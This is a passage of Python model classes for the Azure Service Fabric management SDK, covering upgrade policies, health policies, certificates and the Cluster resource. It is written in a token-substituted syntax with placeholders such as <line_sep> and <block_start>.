:type force_restart: bool :param rolling_upgrade_monitoring_policy: The policy used for monitoring the application upgrade. :type rolling_upgrade_monitoring_policy: ~azure.mgmt.servicefabric.models.ArmRollingUpgradeMonitoringPolicy :param application_health_policy: Defines a health policy used to evaluate the health of an application or one of its children entities. :type application_health_policy: ~azure.mgmt.servicefabric.models.ArmApplicationHealthPolicy :param upgrade_mode: The mode used to monitor health during a rolling upgrade. The values are UnmonitoredAuto, UnmonitoredManual, and Monitored. Possible values include: "Invalid", "UnmonitoredAuto", "UnmonitoredManual", "Monitored". Default value: "Monitored". :type upgrade_mode: str or ~azure.mgmt.servicefabric.models.RollingUpgradeMode :param recreate_application: Determines whether the application should be recreated on update. If value=true, the rest of the upgrade policy parameters are not allowed and it will result in availability loss. 
:type recreate_application: bool """<line_sep>_attribute_map={'upgrade_replica_set_check_timeout':{'key':'upgradeReplicaSetCheckTimeout' 'type':'str'} 'force_restart':{'key':'forceRestart' 'type':'bool'} 'rolling_upgrade_monitoring_policy':{'key':'rollingUpgradeMonitoringPolicy' 'type':'ArmRollingUpgradeMonitoringPolicy'} 'application_health_policy':{'key':'applicationHealthPolicy' 'type':'ArmApplicationHealthPolicy'} 'upgrade_mode':{'key':'upgradeMode' 'type':'str'} 'recreate_application':{'key':'recreateApplication' 'type':'bool'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationUpgradePolicy self).__init__(**kwargs)<line_sep>self.upgrade_replica_set_check_timeout=kwargs.get('upgrade_replica_set_check_timeout' <none>)<line_sep>self.force_restart=kwargs.get('force_restart' <false>)<line_sep>self.rolling_upgrade_monitoring_policy=kwargs.get('rolling_upgrade_monitoring_policy' <none>)<line_sep>self.application_health_policy=kwargs.get('application_health_policy' <none>)<line_sep>self.upgrade_mode=kwargs.get('upgrade_mode' "Monitored")<line_sep>self.recreate_application=kwargs.get('recreate_application' <none>)<block_end><block_end><class_stmt>ApplicationUserAssignedIdentity(msrest.serialization.Model)<block_start>"""ApplicationUserAssignedIdentity. All required parameters must be populated in order to send to Azure. :param name: Required. The friendly name of user assigned identity. :type name: str :param principal_id: Required. The principal id of user assigned identity. 
:type principal_id: str """<line_sep>_validation={'name':{'required':<true>} 'principal_id':{'required':<true>} }<line_sep>_attribute_map={'name':{'key':'name' 'type':'str'} 'principal_id':{'key':'principalId' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationUserAssignedIdentity self).__init__(**kwargs)<line_sep>self.name=kwargs['name']<line_sep>self.principal_id=kwargs['principal_id']<block_end><block_end><class_stmt>ArmApplicationHealthPolicy(msrest.serialization.Model)<block_start>"""Defines a health policy used to evaluate the health of an application or one of its children entities. :param consider_warning_as_error: Indicates whether warnings are treated with the same severity as errors. :type consider_warning_as_error: bool :param max_percent_unhealthy_deployed_applications: The maximum allowed percentage of unhealthy deployed applications. Allowed values are Byte values from zero to 100. The percentage represents the maximum tolerated percentage of deployed applications that can be unhealthy before the application is considered in error. This is calculated by dividing the number of unhealthy deployed applications over the number of nodes where the application is currently deployed on in the cluster. The computation rounds up to tolerate one failure on small numbers of nodes. Default percentage is zero. :type max_percent_unhealthy_deployed_applications: int :param default_service_type_health_policy: The health policy used by default to evaluate the health of a service type. :type default_service_type_health_policy: ~azure.mgmt.servicefabric.models.ArmServiceTypeHealthPolicy :param service_type_health_policy_map: The map with service type health policy per service type name. The map is empty by default. 
:type service_type_health_policy_map: dict[str, ~azure.mgmt.servicefabric.models.ArmServiceTypeHealthPolicy] """<line_sep>_attribute_map={'consider_warning_as_error':{'key':'considerWarningAsError' 'type':'bool'} 'max_percent_unhealthy_deployed_applications':{'key':'maxPercentUnhealthyDeployedApplications' 'type':'int'} 'default_service_type_health_policy':{'key':'defaultServiceTypeHealthPolicy' 'type':'ArmServiceTypeHealthPolicy'} 'service_type_health_policy_map':{'key':'serviceTypeHealthPolicyMap' 'type':'{ArmServiceTypeHealthPolicy}'} }<def_stmt>__init__ self **kwargs<block_start>super(ArmApplicationHealthPolicy self).__init__(**kwargs)<line_sep>self.consider_warning_as_error=kwargs.get('consider_warning_as_error' <false>)<line_sep>self.max_percent_unhealthy_deployed_applications=kwargs.get('max_percent_unhealthy_deployed_applications' 0)<line_sep>self.default_service_type_health_policy=kwargs.get('default_service_type_health_policy' <none>)<line_sep>self.service_type_health_policy_map=kwargs.get('service_type_health_policy_map' <none>)<block_end><block_end><class_stmt>ArmRollingUpgradeMonitoringPolicy(msrest.serialization.Model)<block_start>"""The policy used for monitoring the application upgrade. :param failure_action: The activation Mode of the service package. Possible values include: "Rollback", "Manual". :type failure_action: str or ~azure.mgmt.servicefabric.models.ArmUpgradeFailureAction :param health_check_wait_duration: The amount of time to wait after completing an upgrade domain before applying health policies. It is first interpreted as a string representing an ISO 8601 duration. If that fails, then it is interpreted as a number representing the total number of milliseconds. :type health_check_wait_duration: str :param health_check_stable_duration: The amount of time that the application or cluster must remain healthy before the upgrade proceeds to the next upgrade domain. It is first interpreted as a string representing an ISO 8601 duration. 
If that fails, then it is interpreted as a number representing the total number of milliseconds. :type health_check_stable_duration: str :param health_check_retry_timeout: The amount of time to retry health evaluation when the application or cluster is unhealthy before FailureAction is executed. It is first interpreted as a string representing an ISO 8601 duration. If that fails, then it is interpreted as a number representing the total number of milliseconds. :type health_check_retry_timeout: str :param upgrade_timeout: The amount of time the overall upgrade has to complete before FailureAction is executed. It is first interpreted as a string representing an ISO 8601 duration. If that fails, then it is interpreted as a number representing the total number of milliseconds. :type upgrade_timeout: str :param upgrade_domain_timeout: The amount of time each upgrade domain has to complete before FailureAction is executed. It is first interpreted as a string representing an ISO 8601 duration. If that fails, then it is interpreted as a number representing the total number of milliseconds. 
:type upgrade_domain_timeout: str """<line_sep>_attribute_map={'failure_action':{'key':'failureAction' 'type':'str'} 'health_check_wait_duration':{'key':'healthCheckWaitDuration' 'type':'str'} 'health_check_stable_duration':{'key':'healthCheckStableDuration' 'type':'str'} 'health_check_retry_timeout':{'key':'healthCheckRetryTimeout' 'type':'str'} 'upgrade_timeout':{'key':'upgradeTimeout' 'type':'str'} 'upgrade_domain_timeout':{'key':'upgradeDomainTimeout' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ArmRollingUpgradeMonitoringPolicy self).__init__(**kwargs)<line_sep>self.failure_action=kwargs.get('failure_action' <none>)<line_sep>self.health_check_wait_duration=kwargs.get('health_check_wait_duration' "0")<line_sep>self.health_check_stable_duration=kwargs.get('health_check_stable_duration' "PT0H2M0S")<line_sep>self.health_check_retry_timeout=kwargs.get('health_check_retry_timeout' "PT0H10M0S")<line_sep>self.upgrade_timeout=kwargs.get('upgrade_timeout' "P10675199DT02H48M05.4775807S")<line_sep>self.upgrade_domain_timeout=kwargs.get('upgrade_domain_timeout' "P10675199DT02H48M05.4775807S")<block_end><block_end><class_stmt>ArmServiceTypeHealthPolicy(msrest.serialization.Model)<block_start>"""Represents the health policy used to evaluate the health of services belonging to a service type. :param max_percent_unhealthy_services: The maximum percentage of services allowed to be unhealthy before your application is considered in error. :type max_percent_unhealthy_services: int :param max_percent_unhealthy_partitions_per_service: The maximum percentage of partitions per service allowed to be unhealthy before your application is considered in error. :type max_percent_unhealthy_partitions_per_service: int :param max_percent_unhealthy_replicas_per_partition: The maximum percentage of replicas per partition allowed to be unhealthy before your application is considered in error. 
:type max_percent_unhealthy_replicas_per_partition: int """<line_sep>_validation={'max_percent_unhealthy_services':{'maximum':100 'minimum':0} 'max_percent_unhealthy_partitions_per_service':{'maximum':100 'minimum':0} 'max_percent_unhealthy_replicas_per_partition':{'maximum':100 'minimum':0} }<line_sep>_attribute_map={'max_percent_unhealthy_services':{'key':'maxPercentUnhealthyServices' 'type':'int'} 'max_percent_unhealthy_partitions_per_service':{'key':'maxPercentUnhealthyPartitionsPerService' 'type':'int'} 'max_percent_unhealthy_replicas_per_partition':{'key':'maxPercentUnhealthyReplicasPerPartition' 'type':'int'} }<def_stmt>__init__ self **kwargs<block_start>super(ArmServiceTypeHealthPolicy self).__init__(**kwargs)<line_sep>self.max_percent_unhealthy_services=kwargs.get('max_percent_unhealthy_services' 0)<line_sep>self.max_percent_unhealthy_partitions_per_service=kwargs.get('max_percent_unhealthy_partitions_per_service' 0)<line_sep>self.max_percent_unhealthy_replicas_per_partition=kwargs.get('max_percent_unhealthy_replicas_per_partition' 0)<block_end><block_end><class_stmt>AvailableOperationDisplay(msrest.serialization.Model)<block_start>"""Operation supported by the Service Fabric resource provider. :param provider: The name of the provider. :type provider: str :param resource: The resource on which the operation is performed. :type resource: str :param operation: The operation that can be performed. :type operation: str :param description: Operation description. 
:type description: str """<line_sep>_attribute_map={'provider':{'key':'provider' 'type':'str'} 'resource':{'key':'resource' 'type':'str'} 'operation':{'key':'operation' 'type':'str'} 'description':{'key':'description' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(AvailableOperationDisplay self).__init__(**kwargs)<line_sep>self.provider=kwargs.get('provider' <none>)<line_sep>self.resource=kwargs.get('resource' <none>)<line_sep>self.operation=kwargs.get('operation' <none>)<line_sep>self.description=kwargs.get('description' <none>)<block_end><block_end><class_stmt>AzureActiveDirectory(msrest.serialization.Model)<block_start>"""The settings to enable AAD authentication on the cluster. :param tenant_id: Azure active directory tenant id. :type tenant_id: str :param cluster_application: Azure active directory cluster application id. :type cluster_application: str :param client_application: Azure active directory client application id. :type client_application: str """<line_sep>_attribute_map={'tenant_id':{'key':'tenantId' 'type':'str'} 'cluster_application':{'key':'clusterApplication' 'type':'str'} 'client_application':{'key':'clientApplication' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(AzureActiveDirectory self).__init__(**kwargs)<line_sep>self.tenant_id=kwargs.get('tenant_id' <none>)<line_sep>self.cluster_application=kwargs.get('cluster_application' <none>)<line_sep>self.client_application=kwargs.get('client_application' <none>)<block_end><block_end><class_stmt>CertificateDescription(msrest.serialization.Model)<block_start>"""Describes the certificate details. All required parameters must be populated in order to send to Azure. :param thumbprint: Required. Thumbprint of the primary certificate. :type thumbprint: str :param thumbprint_secondary: Thumbprint of the secondary certificate. :type thumbprint_secondary: str :param x509_store_name: The local certificate store location. 
Possible values include: "AddressBook", "AuthRoot", "CertificateAuthority", "Disallowed", "My", "Root", "TrustedPeople", "TrustedPublisher". :type x509_store_name: str or ~azure.mgmt.servicefabric.models.StoreName """<line_sep>_validation={'thumbprint':{'required':<true>} }<line_sep>_attribute_map={'thumbprint':{'key':'thumbprint' 'type':'str'} 'thumbprint_secondary':{'key':'thumbprintSecondary' 'type':'str'} 'x509_store_name':{'key':'x509StoreName' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(CertificateDescription self).__init__(**kwargs)<line_sep>self.thumbprint=kwargs['thumbprint']<line_sep>self.thumbprint_secondary=kwargs.get('thumbprint_secondary' <none>)<line_sep>self.x509_store_name=kwargs.get('x509_store_name' <none>)<block_end><block_end><class_stmt>ClientCertificateCommonName(msrest.serialization.Model)<block_start>"""Describes the client certificate details using common name. All required parameters must be populated in order to send to Azure. :param is_admin: Required. Indicates if the client certificate has admin access to the cluster. Non admin clients can perform only read only operations on the cluster. :type is_admin: bool :param certificate_common_name: Required. The common name of the client certificate. :type certificate_common_name: str :param certificate_issuer_thumbprint: Required. The issuer thumbprint of the client certificate. 
:type certificate_issuer_thumbprint: str """<line_sep>_validation={'is_admin':{'required':<true>} 'certificate_common_name':{'required':<true>} 'certificate_issuer_thumbprint':{'required':<true>} }<line_sep>_attribute_map={'is_admin':{'key':'isAdmin' 'type':'bool'} 'certificate_common_name':{'key':'certificateCommonName' 'type':'str'} 'certificate_issuer_thumbprint':{'key':'certificateIssuerThumbprint' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ClientCertificateCommonName self).__init__(**kwargs)<line_sep>self.is_admin=kwargs['is_admin']<line_sep>self.certificate_common_name=kwargs['certificate_common_name']<line_sep>self.certificate_issuer_thumbprint=kwargs['certificate_issuer_thumbprint']<block_end><block_end><class_stmt>ClientCertificateThumbprint(msrest.serialization.Model)<block_start>"""Describes the client certificate details using thumbprint. All required parameters must be populated in order to send to Azure. :param is_admin: Required. Indicates if the client certificate has admin access to the cluster. Non admin clients can perform only read only operations on the cluster. :type is_admin: bool :param certificate_thumbprint: Required. The thumbprint of the client certificate. :type certificate_thumbprint: str """<line_sep>_validation={'is_admin':{'required':<true>} 'certificate_thumbprint':{'required':<true>} }<line_sep>_attribute_map={'is_admin':{'key':'isAdmin' 'type':'bool'} 'certificate_thumbprint':{'key':'certificateThumbprint' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ClientCertificateThumbprint self).__init__(**kwargs)<line_sep>self.is_admin=kwargs['is_admin']<line_sep>self.certificate_thumbprint=kwargs['certificate_thumbprint']<block_end><block_end><class_stmt>Resource(msrest.serialization.Model)<block_start>"""The resource model definition. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. 
:ivar id: Azure resource identifier. :vartype id: str :ivar name: Azure resource name. :vartype name: str :ivar type: Azure resource type. :vartype type: str :param location: Required. Azure resource location. :type location: str :param tags: A set of tags. Azure resource tags. :type tags: dict[str, str] :ivar etag: Azure resource etag. :vartype etag: str :ivar system_data: Metadata pertaining to creation and last modification of the resource. :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'location':{'required':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} }<def_stmt>__init__ self **kwargs<block_start>super(Resource self).__init__(**kwargs)<line_sep>self.id=<none><line_sep>self.name=<none><line_sep>self.type=<none><line_sep>self.location=kwargs['location']<line_sep>self.tags=kwargs.get('tags' <none>)<line_sep>self.etag=<none><line_sep>self.system_data=<none><block_end><block_end><class_stmt>Cluster(Resource)<block_start>"""The cluster resource. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :ivar id: Azure resource identifier. :vartype id: str :ivar name: Azure resource name. :vartype name: str :ivar type: Azure resource type. :vartype type: str :param location: Required. Azure resource location. :type location: str :param tags: A set of tags. Azure resource tags. :type tags: dict[str, str] :ivar etag: Azure resource etag. 
:vartype etag: str :ivar system_data: Metadata pertaining to creation and last modification of the resource. :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData :param add_on_features: The list of add-on features to enable in the cluster. :type add_on_features: list[str or ~azure.mgmt.servicefabric.models.AddOnFeatures] :ivar available_cluster_versions: The Service Fabric runtime versions available for this cluster. :vartype available_cluster_versions: list[~azure.mgmt.servicefabric.models.ClusterVersionDetails] :param azure_active_directory: The AAD authentication settings of the cluster. :type azure_active_directory: ~azure.mgmt.servicefabric.models.AzureActiveDirectory :param certificate: The certificate to use for securing the cluster. The certificate provided will be used for node to node security within the cluster, SSL certificate for cluster management endpoint and default admin client. :type certificate: ~azure.mgmt.servicefabric.models.CertificateDescription :param certificate_common_names: Describes a list of server certificates referenced by common name that are used to secure the cluster. :type certificate_common_names: ~azure.mgmt.servicefabric.models.ServerCertificateCommonNames :param client_certificate_common_names: The list of client certificates referenced by common name that are allowed to manage the cluster. :type client_certificate_common_names: list[~azure.mgmt.servicefabric.models.ClientCertificateCommonName] :param client_certificate_thumbprints: The list of client certificates referenced by thumbprint that are allowed to manage the cluster. :type client_certificate_thumbprints: list[~azure.mgmt.servicefabric.models.ClientCertificateThumbprint] :param cluster_code_version: The Service Fabric runtime version of the cluster. This property can only by set the user when **upgradeMode** is set to 'Manual'. To get list of available Service Fabric versions for new clusters use `ClusterVersion API <./ClusterVersion.md>`_. 
To get the list of available version for existing clusters use **availableClusterVersions**. :type cluster_code_version: str :ivar cluster_endpoint: The Azure Resource Provider endpoint. A system service in the cluster connects to this endpoint. :vartype cluster_endpoint: str :ivar cluster_id: A service generated unique identifier for the cluster resource. :vartype cluster_id: str :ivar cluster_state: The current state of the cluster. * WaitingForNodes - Indicates that the cluster resource is created and the resource provider is waiting for Service Fabric VM extension to boot up and report to it. * Deploying - Indicates that the Service Fabric runtime is being installed on the VMs. Cluster resource will be in this state until the cluster boots up and system services are up. * BaselineUpgrade - Indicates that the cluster is upgrading to establishes the cluster version. This upgrade is automatically initiated when the cluster boots up for the first time. * UpdatingUserConfiguration - Indicates that the cluster is being upgraded with the user provided configuration. * UpdatingUserCertificate - Indicates that the cluster is being upgraded with the user provided certificate. * UpdatingInfrastructure - Indicates that the cluster is being upgraded with the latest Service Fabric runtime version. This happens only when the **upgradeMode** is set to 'Automatic'. * EnforcingClusterVersion - Indicates that cluster is on a different version than expected and the cluster is being upgraded to the expected version. * UpgradeServiceUnreachable - Indicates that the system service in the cluster is no longer polling the Resource Provider. Clusters in this state cannot be managed by the Resource Provider. * AutoScale - Indicates that the ReliabilityLevel of the cluster is being adjusted. * Ready - Indicates that the cluster is in a stable state. 
Possible values include: "WaitingForNodes", "Deploying", "BaselineUpgrade", "UpdatingUserConfiguration", "UpdatingUserCertificate", "UpdatingInfrastructure", "EnforcingClusterVersion", "UpgradeServiceUnreachable", "AutoScale", "Ready". :vartype cluster_state: str or ~azure.mgmt.servicefabric.models.ClusterState :param diagnostics_storage_account_config: The storage account information for storing Service Fabric diagnostic logs. :type diagnostics_storage_account_config: ~azure.mgmt.servicefabric.models.DiagnosticsStorageAccountConfig :param event_store_service_enabled: Indicates if the event store service is enabled. :type event_store_service_enabled: bool :param fabric_settings: The list of custom fabric settings to configure the cluster. :type fabric_settings: list[~azure.mgmt.servicefabric.models.SettingsSectionDescription] :param management_endpoint: The http management endpoint of the cluster. :type management_endpoint: str :param node_types: The list of node types in the cluster. :type node_types: list[~azure.mgmt.servicefabric.models.NodeTypeDescription] :ivar provisioning_state: The provisioning state of the cluster resource. Possible values include: "Updating", "Succeeded", "Failed", "Canceled". :vartype provisioning_state: str or ~azure.mgmt.servicefabric.models.ProvisioningState :param reliability_level: The reliability level sets the replica set size of system services. Learn about `ReliabilityLevel <https://docs.microsoft.com/azure/service-fabric/service-fabric-cluster-capacity>`_. * None - Run the System services with a target replica set count of 1. This should only be used for test clusters. * Bronze - Run the System services with a target replica set count of 3. This should only be used for test clusters. * Silver - Run the System services with a target replica set count of 5. * Gold - Run the System services with a target replica set count of 7. * Platinum - Run the System services with a target replica set count of 9. 
Possible values include: "None", "Bronze", "Silver", "Gold", "Platinum". :type reliability_level: str or ~azure.mgmt.servicefabric.models.ReliabilityLevel :param reverse_proxy_certificate: The server certificate used by reverse proxy. :type reverse_proxy_certificate: ~azure.mgmt.servicefabric.models.CertificateDescription :param reverse_proxy_certificate_common_names: Describes a list of server certificates referenced by common name that are used to secure the cluster. :type reverse_proxy_certificate_common_names: ~azure.mgmt.servicefabric.models.ServerCertificateCommonNames :param upgrade_description: The policy to use when upgrading the cluster. :type upgrade_description: ~azure.mgmt.servicefabric.models.ClusterUpgradePolicy :param upgrade_mode: The upgrade mode of the cluster when new Service Fabric runtime version is available. Possible values include: "Automatic", "Manual". Default value: "Automatic". :type upgrade_mode: str or ~azure.mgmt.servicefabric.models.UpgradeMode :param application_type_versions_cleanup_policy: The policy used to clean up unused versions. :type application_type_versions_cleanup_policy: ~azure.mgmt.servicefabric.models.ApplicationTypeVersionsCleanupPolicy :param vm_image: The VM image VMSS has been configured with. Generic names such as Windows or Linux can be used. :type vm_image: str :param sf_zonal_upgrade_mode: This property controls the logical grouping of VMs in upgrade domains (UDs). This property can't be modified if a node type with multiple Availability Zones is already present in the cluster. Possible values include: "Parallel", "Hierarchical". :type sf_zonal_upgrade_mode: str or ~azure.mgmt.servicefabric.models.SfZonalUpgradeMode :param vmss_zonal_upgrade_mode: This property defines the upgrade mode for the virtual machine scale set, it is mandatory if a node type with multiple Availability Zones is added. Possible values include: "Parallel", "Hierarchical". 
:type vmss_zonal_upgrade_mode: str or ~azure.mgmt.servicefabric.models.VmssZonalUpgradeMode :param infrastructure_service_manager: Indicates if infrastructure service manager is enabled. :type infrastructure_service_manager: bool :param upgrade_wave: Indicates when new cluster runtime version upgrades will be applied after they are released. By default is Wave0. Only applies when **upgradeMode** is set to 'Automatic'. Possible values include: "Wave0", "Wave1", "Wave2". :type upgrade_wave: str or ~azure.mgmt.servicefabric.models.ClusterUpgradeCadence :param upgrade_pause_start_timestamp_utc: Indicates the start date and time to pause automatic runtime version upgrades on the cluster for an specific period of time on the cluster (UTC). :type upgrade_pause_start_timestamp_utc: ~datetime.datetime :param upgrade_pause_end_timestamp_utc: Indicates the end date and time to pause automatic runtime version upgrades on the cluster for an specific period of time on the cluster (UTC). :type upgrade_pause_end_timestamp_utc: ~datetime.datetime :param wave_upgrade_paused: Boolean to pause automatic runtime version upgrades to the cluster. :type wave_upgrade_paused: bool :param notifications: Indicates a list of notification channels for cluster events. 
:type notifications: list[~azure.mgmt.servicefabric.models.Notification] """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'location':{'required':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} 'available_cluster_versions':{'readonly':<true>} 'cluster_endpoint':{'readonly':<true>} 'cluster_id':{'readonly':<true>} 'cluster_state':{'readonly':<true>} 'provisioning_state':{'readonly':<true>} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} 'add_on_features':{'key':'properties.addOnFeatures' 'type':'[str]'} 'available_cluster_versions':{'key':'properties.availableClusterVersions' 'type':'[ClusterVersionDetails]'} 'azure_active_directory':{'key':'properties.azureActiveDirectory' 'type':'AzureActiveDirectory'} 'certificate':{'key':'properties.certificate' 'type':'CertificateDescription'} 'certificate_common_names':{'key':'properties.certificateCommonNames' 'type':'ServerCertificateCommonNames'} 'client_certificate_common_names':{'key':'properties.clientCertificateCommonNames' 'type':'[ClientCertificateCommonName]'} 'client_certificate_thumbprints':{'key':'properties.clientCertificateThumbprints' 'type':'[ClientCertificateThumbprint]'} 'cluster_code_version':{'key':'properties.clusterCodeVersion' 'type':'str'} 'cluster_endpoint':{'key':'properties.clusterEndpoint' 'type':'str'} 'cluster_id':{'key':'properties.clusterId' 'type':'str'} 'cluster_state':{'key':'properties.clusterState' 'type':'str'} 'diagnostics_storage_account_config':{'key':'properties.diagnosticsStorageAccountConfig' 'type':'DiagnosticsStorageAccountConfig'} 'event_store_service_enabled':{'key':'properties.eventStoreServiceEnabled' 'type':'bool'} 
'fabric_settings':{'key':'properties.fabricSettings' 'type':'[SettingsSectionDescription]'} 'management_endpoint':{'key':'properties.managementEndpoint' 'type':'str'} 'node_types':{'key':'properties.nodeTypes' 'type':'[NodeTypeDescription]'} 'provisioning_state':{'key':'properties.provisioningState' 'type':'str'} 'reliability_level':{'key':'properties.reliabilityLevel' 'type':'str'} 'reverse_proxy_certificate':{'key':'properties.reverseProxyCertificate' 'type':'CertificateDescription'} 'reverse_proxy_certificate_common_names':{'key':'properties.reverseProxyCertificateCommonNames' 'type':'ServerCertificateCommonNames'} 'upgrade_description':{'key':'properties.upgradeDescription' 'type':'ClusterUpgradePolicy'} 'upgrade_mode':{'key':'properties.upgradeMode' 'type':'str'} 'application_type_versions_cleanup_policy':{'key':'properties.applicationTypeVersionsCleanupPolicy' 'type':'ApplicationTypeVersionsCleanupPolicy'} 'vm_image':{'key':'properties.vmImage' 'type':'str'} 'sf_zonal_upgrade_mode':{'key':'properties.sfZonalUpgradeMode' 'type':'str'} 'vmss_zonal_upgrade_mode':{'key':'properties.vmssZonalUpgradeMode' 'type':'str'} 'infrastructure_service_manager':{'key':'properties.infrastructureServiceManager' 'type':'bool'} 'upgrade_wave':{'key':'properties.upgradeWave' 'type':'str'} 'upgrade_pause_start_timestamp_utc':{'key':'properties.upgradePauseStartTimestampUtc' 'type':'iso-8601'} 'upgrade_pause_end_timestamp_utc':{'key':'properties.upgradePauseEndTimestampUtc' 'type':'iso-8601'} 'wave_upgrade_paused':{'key':'properties.waveUpgradePaused' 'type':'bool'} 'notifications':{'key':'properties.notifications' 'type':'[Notification]'} }<def_stmt>__init__ self **kwargs<block_start>super(Cluster self).__init__(**kwargs)<line_sep>self.add_on_features=kwargs.get('add_on_features' <none>)<line_sep>self.available_cluster_versions=<none><line_sep>self.azure_active_directory=kwargs.get('azure_active_directory' <none>)<line_sep>self.certificate=kwargs.get('certificate' 
<none>)<line_sep>self.certificate_common_names=kwargs.get('certificate_common_names' <none>)<line_sep>self.client_certificate_common_names=kwargs.get('client_certificate_common_names' <none>)<line_sep>self.client_certificate_thumbprints=kwargs.get('client_certificate_thumbprints' <none>)<line_sep>self.cluster_code_version=kwargs.get('cluster_code_version' <none>)<line_sep>self.cluster_endpoint=<none><line_sep>self.cluster_id=<none><line_sep>self.cluster_state=<none><line_sep>self.diagnostics_storage_account_config=kwargs.get('diagnostics_storage_account_config' <none>)<line_sep>self.event_store_service_enabled=kwargs.get('event_store_service_enabled' <none>)<line_sep>self.fabric_settings=kwargs.get('fabric_settings' <none>)<line_sep>self.management_endpoint=kwargs.get('management_endpoint' <none>)<line_sep>self.node_types=kwargs.get('node_types' <none>)<line_sep>self.provisioning_state=<none><line_sep>self.reliability_level=kwargs.get('reliability_level' <none>)<line_sep>self.reverse_proxy_certificate=kwargs.get('reverse_proxy_certificate' <none>)<line_sep>self.reverse_proxy_certificate_common_names=kwargs.get('reverse_proxy_certificate_common_names' <none>)<line_sep>self.upgrade_description=kwargs.get('upgrade_description' <none>)<line_sep>self.upgrade_mode=kwargs.get('upgrade_mode' "Automatic")<line_sep>self.application_type_versions_cleanup_policy=kwargs.get('application_type_versions_cleanup_policy' <none>)<line_sep>self.vm_image=kwargs.get('vm_image' <none>)<line_sep>self.sf_zonal_upgrade_mode=kwargs.get('sf_zonal_upgrade_mode' <none>)<line_sep>self.vmss_zonal_upgrade_mode=kwargs.get('vmss_zonal_upgrade_mode' <none>)<line_sep>self.infrastructure_service_manager=kwargs.get('infrastructure_service_manager' <none>)<line_sep>self.upgrade_wave=kwargs.get('upgrade_wave' <none>)<line_sep>self.upgrade_pause_start_timestamp_utc=kwargs.get('upgrade_pause_start_timestamp_utc' 
<none>)<line_sep>self.upgrade_pause_end_timestamp_utc=kwargs.get('upgrade_pause_end_timestamp_utc' <none>)<line_sep>self.wave_upgrade_paused=kwargs.get('wave_upgrade_paused' <none>)<line_sep>self.notifications=kwargs.get('notifications' <none>)<block_end><block_end><class_stmt>ClusterCodeVersionsListResult(msrest.serialization.Model)<block_start>"""The list results of the Service Fabric runtime versions. :param value: :type value: list[~azure.mgmt.servicefabric.models.ClusterCodeVersionsResult] :param next_link: The URL to use for getting the next set of results. :type next_link: str """<line_sep>_attribute_map={'value':{'key':'value' 'type':'[ClusterCodeVersionsResult]'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterCodeVersionsListResult self).__init__(**kwargs)<line_sep>self.value=kwargs.get('value' <none>)<line_sep>self.next_link=kwargs.get('next_link' <none>)<block_end><block_end><class_stmt>ClusterCodeVersionsResult(msrest.serialization.Model)<block_start>"""The result of the Service Fabric runtime versions. :param id: The identification of the result. :type id: str :param name: The name of the result. :type name: str :param type: The result resource type. :type type: str :param code_version: The Service Fabric runtime version of the cluster. :type code_version: str :param support_expiry_utc: The date of expiry of support of the version. :type support_expiry_utc: str :param environment: Indicates if this version is for Windows or Linux operating system. Possible values include: "Windows", "Linux". 
:type environment: str or ~azure.mgmt.servicefabric.models.ClusterEnvironment """<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'code_version':{'key':'properties.codeVersion' 'type':'str'} 'support_expiry_utc':{'key':'properties.supportExpiryUtc' 'type':'str'} 'environment':{'key':'properties.environment' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterCodeVersionsResult self).__init__(**kwargs)<line_sep>self.id=kwargs.get('id' <none>)<line_sep>self.name=kwargs.get('name' <none>)<line_sep>self.type=kwargs.get('type' <none>)<line_sep>self.code_version=kwargs.get('code_version' <none>)<line_sep>self.support_expiry_utc=kwargs.get('support_expiry_utc' <none>)<line_sep>self.environment=kwargs.get('environment' <none>)<block_end><block_end><class_stmt>ClusterHealthPolicy(msrest.serialization.Model)<block_start>"""Defines a health policy used to evaluate the health of the cluster or of a cluster node. :param max_percent_unhealthy_nodes: The maximum allowed percentage of unhealthy nodes before reporting an error. For example, to allow 10% of nodes to be unhealthy, this value would be 10. The percentage represents the maximum tolerated percentage of nodes that can be unhealthy before the cluster is considered in error. If the percentage is respected but there is at least one unhealthy node, the health is evaluated as Warning. The percentage is calculated by dividing the number of unhealthy nodes over the total number of nodes in the cluster. The computation rounds up to tolerate one failure on small numbers of nodes. Default percentage is zero. In large clusters, some nodes will always be down or out for repairs, so this percentage should be configured to tolerate that. :type max_percent_unhealthy_nodes: int :param max_percent_unhealthy_applications: The maximum allowed percentage of unhealthy applications before reporting an error. 
